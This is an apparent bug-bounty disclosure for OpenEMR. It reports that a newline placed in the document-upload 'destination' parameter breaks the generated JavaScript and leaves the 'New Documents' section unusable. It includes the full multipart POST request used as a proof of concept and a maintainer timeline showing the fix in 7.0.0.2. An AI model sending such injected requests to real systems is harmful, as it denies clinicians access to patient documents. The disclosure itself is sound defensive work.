Improper Name Validation in Upload Document Form in openemr/openemr

Valid

Reported on

Oct 6th 2022


Description

The name of any uploaded document can be manipulated using the destination parameter, to include new line characters in its name, breaking the execution of JS code in "New Documents" section from "Miscellaneous" menu, that will be blank until the document is removed from DB.

Proof of Concept

The following request was sent to upload a dummy file with a destination parameter including a new line character:

POST /openemr/controller.php?document&upload&patient_id=00&parent_id=1& HTTP/1.1
(...snip...)
Content-Type: multipart/form-data; boundary=---------------------------139184551113566022282519832587
Upgrade-Insecure-Requests: 1

-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="file[]"; filename="1234.txt"
Content-Type: text/plain

TEST
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="dicom_folder[]"; filename=""
Content-Type: application/octet-stream


-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="destination"

test
1234
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="passphrase"


-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="patient_id"

00
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="category_id"

1
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="process"

true
-----------------------------139184551113566022282519832587--

That value was used as a "virtual" name that was reflected in JS code generated from "New Documents" section:

newNode_14 = newNode.addItem(new TreeNode('2022-10-05 test
1234-16', 'file3.png', '/openemr/controller.php?document&view&patient_id=00&doc_id=16&', false, true, '', '', 'folder-expanded.gif'));

That new line break the execution of JS code that cannot show the section contents anymore, leaving the user without the option of managing files.

Uncaught SyntaxError: '' string literal contains an unescaped line break controller.php:116:60

Impact

The success exploitation of this issue could lead into a denial of service, leaving the documents section broken and not usable until the record is removed from database.

We are processing your report and will contact the openemr team within 24 hours. 7 months ago
We have contacted a member of the openemr team and are waiting to hear back 7 months ago
We have sent a follow up to the openemr team. We will try again in 7 days. 7 months ago
openemr/openemr maintainer has acknowledged this report 7 months ago
Brady Miller validated this vulnerability 7 months ago
xkulio has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller marked this as fixed in 7.0.0.2 with commit 37d7ed 7 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller published this vulnerability 5 months ago
Brady Miller
5 months ago

Maintainer


@admin, please assign a CVE. thanks!

to join this conversation